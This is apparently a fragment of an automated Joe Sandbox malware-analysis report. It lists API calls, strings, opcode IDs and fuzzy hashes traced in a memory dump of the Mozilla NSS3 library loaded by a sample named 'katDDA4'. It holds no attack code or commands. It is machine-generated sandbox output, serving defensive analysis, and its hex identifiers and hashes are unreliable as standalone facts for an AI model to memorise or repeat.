                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D0DBDEC
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13116E
                                                              • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6D0DBE03
                                                                • Part of subcall function 6D12FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D128D2D,?,00000000,?), ref: 6D12FB85
                                                                • Part of subcall function 6D12FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D12FBB1
                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6D0DBE22
                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6D0DBE30
                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D0DBE3B
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                              • String ID:
                                                              • API String ID: 1821307800-0
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6D161C74
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6D161C92
                                                              • free.MOZGLUE(?), ref: 6D161C99
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6D161CCB
                                                              • free.MOZGLUE(?), ref: 6D161CD2
                                                              Similarity
                                                              • API ID: CriticalDeleteSectionfree$ErrorValue
                                                              • String ID:
                                                              • API String ID: 3805613680-0
                                                              APIs
                                                              • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6D0C3D77,?,?,6D0C4E1D), ref: 6D1C1C8A
                                                              • sqlite3_free.NSS3(00000000), ref: 6D1C1CB6
                                                              Similarity
                                                              • API ID: sqlite3_freesqlite3_mprintf
                                                              • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                              • API String ID: 1840970956-3705377941
                                                              APIs
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6D13ED6B
                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6D13EDCE
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • free.MOZGLUE(00000000,?,?,?,?,6D13B04F), ref: 6D13EE46
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D13EECA
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6D13EEEA
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6D13EEFB
                                                              Similarity
                                                              • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                              • String ID:
                                                              • API String ID: 3768380896-0
                                                              APIs
                                                                • Part of subcall function 6D165B40: PR_GetIdentitiesLayer.NSS3 ref: 6D165B56
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D163D3F
                                                                • Part of subcall function 6D0DBA90: PORT_NewArena_Util.NSS3(00000800,6D163CAF,?), ref: 6D0DBABF
                                                                • Part of subcall function 6D0DBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6D163CAF,?), ref: 6D0DBAD5
                                                                • Part of subcall function 6D0DBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6D163CAF,?), ref: 6D0DBB08
                                                                • Part of subcall function 6D0DBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6D163CAF,?), ref: 6D0DBB1A
                                                                • Part of subcall function 6D0DBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6D163CAF,?), ref: 6D0DBB3B
                                                              • PR_EnterMonitor.NSS3(?), ref: 6D163CCB
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D1990AB
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D1990C9
                                                                • Part of subcall function 6D199090: EnterCriticalSection.KERNEL32 ref: 6D1990E5
                                                                • Part of subcall function 6D199090: TlsGetValue.KERNEL32 ref: 6D199116
                                                                • Part of subcall function 6D199090: LeaveCriticalSection.KERNEL32 ref: 6D19913F
                                                              • PR_EnterMonitor.NSS3(?), ref: 6D163CE2
                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D163CF8
                                                              • PR_ExitMonitor.NSS3(?), ref: 6D163D15
                                                              • PR_ExitMonitor.NSS3(?), ref: 6D163D2E
                                                              Similarity
                                                              • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                              • String ID:
                                                              • API String ID: 4030862364-0
                                                              APIs
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D12FE08
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D12FE1D
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13116E
                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D12FE29
                                                              • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D12FE3D
                                                              • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D12FE62
                                                              • free.MOZGLUE(00000000,?,?,?,?), ref: 6D12FE6F
                                                              Similarity
                                                              • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                              • String ID:
                                                              • API String ID: 660648399-0
                                                              APIs
                                                              • PR_Lock.NSS3 ref: 6D1DFD9E
                                                                • Part of subcall function 6D199BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6D0C1A48), ref: 6D199BB3
                                                                • Part of subcall function 6D199BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6D0C1A48), ref: 6D199BC8
                                                              • PR_WaitCondVar.NSS3(000000FF), ref: 6D1DFDB9
                                                                • Part of subcall function 6D0BA900: TlsGetValue.KERNEL32(00000000,?,6D2314E4,?,6D054DD9), ref: 6D0BA90F
                                                                • Part of subcall function 6D0BA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6D0BA94F
                                                              • PR_Unlock.NSS3 ref: 6D1DFDD4
                                                              • PR_Lock.NSS3 ref: 6D1DFDF2
                                                              • PR_NotifyAllCondVar.NSS3 ref: 6D1DFE0D
                                                              • PR_Unlock.NSS3 ref: 6D1DFE23
                                                              Similarity
                                                              • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                              • String ID:
                                                              • API String ID: 3365241057-0
                                                              APIs
                                                              • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6D11FC55
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D11FCB2
                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6D11FDB7
                                                              • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6D11FDDE
                                                                • Part of subcall function 6D128800: TlsGetValue.KERNEL32(?,6D13085A,00000000,?,6D0D8369,?), ref: 6D128821
                                                                • Part of subcall function 6D128800: TlsGetValue.KERNEL32(?,?,6D13085A,00000000,?,6D0D8369,?), ref: 6D12883D
                                                                • Part of subcall function 6D128800: EnterCriticalSection.KERNEL32(?,?,?,6D13085A,00000000,?,6D0D8369,?), ref: 6D128856
                                                                • Part of subcall function 6D128800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D128887
                                                                • Part of subcall function 6D128800: PR_Unlock.NSS3(?,?,?,?,6D13085A,00000000,?,6D0D8369,?), ref: 6D128899
                                                              Similarity
                                                              • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                              • String ID: pkcs11:
                                                              • API String ID: 362709927-2446828420
                                                              APIs
                                                              • memcmp.VCRUNTIME140(00000000,?,?), ref: 6D05BE02
                                                                • Part of subcall function 6D189C40: memcmp.VCRUNTIME140(?,00000000,6D05C52B), ref: 6D189D53
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D05BE9F
                                                              Strings
                                                              • %s at line %d of [%.10s], xrefs: 6D05BE98
                                                              • database corruption, xrefs: 6D05BE93
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D05BE89
                                                              Similarity
                                                              • API ID: memcmp$sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 1135338897-598938438
                                                              • Opcode ID: 595db922293fd5f5b706edd7af9a151f0f794bf06d41063c8307b774464e3a92
                                                              • Instruction ID: b952736a6f84e32db5f948f22c573f81a84c0cf7663f49b6a2db853dc90ca59d
                                                              • Opcode Fuzzy Hash: 595db922293fd5f5b706edd7af9a151f0f794bf06d41063c8307b774464e3a92
                                                              • Instruction Fuzzy Hash: B1314034A4865A8BE700CF288AD4B6FBBA6AF41314B4D8004EE481B282D371FC30C3D2
                                                              APIs
                                                              • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6D0C0BDE), ref: 6D0C0DCB
                                                              • strrchr.VCRUNTIME140(00000000,0000005C,?,6D0C0BDE), ref: 6D0C0DEA
                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6D0C0BDE), ref: 6D0C0DFC
                                                              • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6D0C0BDE), ref: 6D0C0E32
                                                              Strings
                                                              • %s incr => %d (find lib), xrefs: 6D0C0E2D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: strrchr$Print_stricmp
                                                              • String ID: %s incr => %d (find lib)
                                                              • API String ID: 97259331-2309350800
                                                              • Opcode ID: ea8b2ddb3a4601feba0aa27ea0a53ac644c77eef5f04e798c621eeba68baf854
                                                              • Instruction ID: 7980165adaa48971f15d34ff5ce7b5bf8423b04ffe9fe39e2fa869d202fa59c3
                                                              • Opcode Fuzzy Hash: ea8b2ddb3a4601feba0aa27ea0a53ac644c77eef5f04e798c621eeba68baf854
                                                              • Instruction Fuzzy Hash: BB01D8B1A446149FE7208F669C45F2B73ECDF45A49B05442DEA09D3242E7B1ED14CAE2
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D069CF2
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6D069D45
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D069D8B
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6D069DDE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 3168844106-0
                                                              • Opcode ID: bcce4ab7492f74ec96f5875010a5481b048512298a9882ab522f51773ec35ce3
                                                              • Instruction ID: d3a3627c85552d1406029cd1ca5ca87c01683b0a87184d43456398599c94d716
                                                              • Opcode Fuzzy Hash: bcce4ab7492f74ec96f5875010a5481b048512298a9882ab522f51773ec35ce3
                                                              • Instruction Fuzzy Hash: FAA1A135A041418BFF199F34E98DB7F37B5BF86718F09002DE4069B640DB3AA942DB62
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DE1B
                                                              • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6D17DE77
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                              • String ID:
                                                              • API String ID: 2700453212-0
                                                              • Opcode ID: 859c04b06c421bc06eee2da5628771573972707ba496043b49ac80cc352dd7f0
                                                              • Instruction ID: adb90d25d75d2e695ad7dfe4a269d7eb145364215baf5c183df7ea84b0233973
                                                              • Opcode Fuzzy Hash: 859c04b06c421bc06eee2da5628771573972707ba496043b49ac80cc352dd7f0
                                                              • Instruction Fuzzy Hash: 66719870A04319CFCB20CF99C58079AB7B0FF99714F26806DD9596B329DBB0A902CF90
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D0CEDFD
                                                              • calloc.MOZGLUE(00000001,00000000), ref: 6D0CEE64
                                                              • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6D0CEECC
                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D0CEEEB
                                                              • free.MOZGLUE(?), ref: 6D0CEEF6
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ErrorValuecallocfreememcpy
                                                              • String ID:
                                                              • API String ID: 3833505462-0
                                                              • Opcode ID: 3515ec2a634ad93496372190e10bb1c263f1d2ba5d5460196b0d70ed1b7d1966
                                                              • Instruction ID: a2da2757b8991c1edf26df0fed29444e719eb75400a2f4840cb35d84c5bb869c
                                                              • Opcode Fuzzy Hash: 3515ec2a634ad93496372190e10bb1c263f1d2ba5d5460196b0d70ed1b7d1966
                                                              • Instruction Fuzzy Hash: 8E31D0B19046019BF7219F28CC46B6F7BF4FB46388F450528ED5AC7251E731E914CBA2
                                                              APIs
                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D0D1E0B
                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D0D1E24
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D0D1E3B
                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6D0D1E8A
                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6D0D1EAD
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Error$Choice_DecodeTimeUtil
                                                              • String ID:
                                                              • API String ID: 1529734605-0
                                                              • Opcode ID: 5abffe39f9d7bf95ba0d4700b5d8e6f21a0ef4b6d151ea3b17df42533300e844
                                                              • Instruction ID: 5271ec972130d0db00687ef2ae55f39bab3eefe7692b741a6021fe833765dd20
                                                              • Opcode Fuzzy Hash: 5abffe39f9d7bf95ba0d4700b5d8e6f21a0ef4b6d151ea3b17df42533300e844
                                                              • Instruction Fuzzy Hash: 96212572E08311ABE7018F68DC40B5F73E5AB84328F458639EE6957384EB30DA0587D3
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,6D0D3FFF,00000000,?,?,?,?,?,6D0D1A1C,00000000,00000000), ref: 6D0DADA7
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6D0D3FFF,00000000,?,?,?,?,?,6D0D1A1C,00000000,00000000), ref: 6D0DADB4
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,6D0D3FFF,?,?,?,?,6D0D3FFF,00000000,?,?,?,?,?,6D0D1A1C,00000000), ref: 6D0DADD5
                                                                • Part of subcall function 6D12FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D128D2D,?,00000000,?), ref: 6D12FB85
                                                                • Part of subcall function 6D12FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D12FBB1
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D1F94B0,?,?,?,?,?,?,?,?,6D0D3FFF,00000000,?), ref: 6D0DADEC
                                                                • Part of subcall function 6D12B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D2018D0,?), ref: 6D12B095
                                                              • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D0D3FFF), ref: 6D0DAE3C
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                              • String ID:
                                                              • API String ID: 2372449006-0
                                                              • Opcode ID: 1ab05bf00ce5c059837a80515eebb7a880664e530ad5fd3a5b3b7d6ac55d82fb
                                                              • Instruction ID: 4188c3b3a2838d675a4cbf2228af0a25def97b100f8281d460f63be48fae7b69
                                                              • Opcode Fuzzy Hash: 1ab05bf00ce5c059837a80515eebb7a880664e530ad5fd3a5b3b7d6ac55d82fb
                                                              • Instruction Fuzzy Hash: 03117832E043052FF7109B649C40F7F73F8DFA124CF05412AED1A96241FBA0A994C2E2
                                                              APIs
                                                                • Part of subcall function 6D111E10: TlsGetValue.KERNEL32 ref: 6D111E36
                                                                • Part of subcall function 6D111E10: EnterCriticalSection.KERNEL32(?,?,?,6D0EB1EE,2404110F,?,?), ref: 6D111E4B
                                                                • Part of subcall function 6D111E10: PR_Unlock.NSS3 ref: 6D111E76
                                                              • free.MOZGLUE(?,6D0FD079,00000000,00000001), ref: 6D0FCDA5
                                                              • PK11_FreeSymKey.NSS3(?,6D0FD079,00000000,00000001), ref: 6D0FCDB6
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6D0FD079,00000000,00000001), ref: 6D0FCDCF
                                                              • DeleteCriticalSection.KERNEL32(?,6D0FD079,00000000,00000001), ref: 6D0FCDE2
                                                              • free.MOZGLUE(?), ref: 6D0FCDE9
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                              • String ID:
                                                              • API String ID: 1720798025-0
                                                              • Opcode ID: 10166f59a04adbe4403e874ca2a22ee3244f719c5c03e03add88e44728cc3d3f
                                                              • Instruction ID: 1a0a05e27cc1ff59ce9874af23d939d4eb4dbc57f20e2a99c4a36dc66b984991
                                                              • Opcode Fuzzy Hash: 10166f59a04adbe4403e874ca2a22ee3244f719c5c03e03add88e44728cc3d3f
                                                              • Instruction Fuzzy Hash: 5811C2B2A04206ABEF008E65EC86F6BB7ACFF046687000131FE1987505E732E475C7E1
                                                              APIs
                                                                • Part of subcall function 6D165B40: PR_GetIdentitiesLayer.NSS3 ref: 6D165B56
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D162D9C
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • PR_EnterMonitor.NSS3(?), ref: 6D162DB2
                                                              • PR_EnterMonitor.NSS3(?), ref: 6D162DCF
                                                              • PR_ExitMonitor.NSS3(?), ref: 6D162DF2
                                                              • PR_ExitMonitor.NSS3(?), ref: 6D162E0B
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                              • String ID:
                                                              • API String ID: 1593528140-0
                                                              • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                              • Instruction ID: 6a685f989d6e3be84acd244e6a7802560cd98657aeb53be4d8554467745fac9b
                                                              • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                              • Instruction Fuzzy Hash: 0C0104B5A042405FEB308F29FC00BC7B7A5EF41318F010434EA598B215D672F83186A3
                                                              APIs
                                                              • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBDC3
